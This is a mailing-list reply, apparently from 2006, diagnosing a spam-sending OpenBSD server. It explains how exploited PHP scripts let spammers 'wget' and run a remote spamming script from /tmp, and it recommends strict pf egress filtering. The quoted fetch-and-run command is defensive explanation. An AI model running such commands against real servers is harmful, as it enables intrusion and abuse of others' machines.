On Wednesday 25 January 2006 12:09, you wrote:
> ... I've noticed that the
> "mailstats" command reports 130000 (!!!) messages sent (!) outside. My
> computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the
> website;

There's one potential smoking gun right there. PHP. You know PGP stands for 
'Pretty Good Privacy'? Well, I think PHP stands for 'Pretty Hopeless 

What PHP scripts are you or your users running? Any phpbb installations? 
*nukes? What other PHP scripts are installed? phpbb and the various nukes are 
notorious for exploits.

It is quite often the case that well known PHP scripts are getting exploited - 
I've seen it twice in the field where a PHP script was exploited by 
phishers/spammers. The general sequence of events is:

1. User installs exploitable PHP script
2. Phisherman finds it.
3. Phisherman exploits it, and using the shell execution exploit, executes 
'cd /tmp; wget some-evil-script.php' and then exploits it again to 
run /tmp/some-evil-script.php (in PHP command line mode).

Some-evil-script.php turns out to be a spamming script. They don't need to 
root your server, they just need to be able to write somewhere. Have a poke 
around where Apache has write access, I bet you find some dodgy PHP scripts. 
Look through the logs for attempted exploits on PHP scripts (you can usually 
find %-encoded versions of commands in the arguments to the PHP script).

The other possibility is one of your users has a virus/trojan/worm that uses 
their Outlook settings to relay mail through your mail server. Tell your 
users to relay through their ISP only, you just don't want to get involved 
with being the mail relay for your users if you can help it. However, I 
suspect you've been exploited via a buggy insecure PHP script.

To stop this happening again:
Apply strict egress filtering. Allow *no traffic out at all*. There is 
probably no reason your server should be making any outbound connections 
except via a few daemons (DNS and outbound SMTP spring to mind - for those 
use 'pf' rules that only allow BIND and sendmail to send data out on those 
ports). Strict egress filtering will prevent phishers/spammers from managing 
to do the 'wget some-evil-script.php' to get the spamming script onto your 
No, 'chmod 700 wget' is no substitute - it's trivial to write a Perl script 
that can be injected via your vulnerable PHP script to do open a socket to a 
remote server and download a file. Block ALL OUTBOUND ACCESS to anything 
except for what explicitly should happen: DNS lookups to the two or three DNS 
servers listed in resolv.conf, and SMTP access (if you absolutely cannot 
avoid allowing outbound SMTP) to the sendmail process only (user _sendmail).

Egress filtering is often forgotten, missed or not considered - but it is 
every bit as important as filtering inbound traffic (possibly more so, as y 
ou have discovered). Never forget egress filtering.

And keep an eye on your users - particularly what PHP scripts they have 
installed. Apply a LART if they don't keep up to date with security patches. 
Have a policy of banning scripts known to have a bad security track record.

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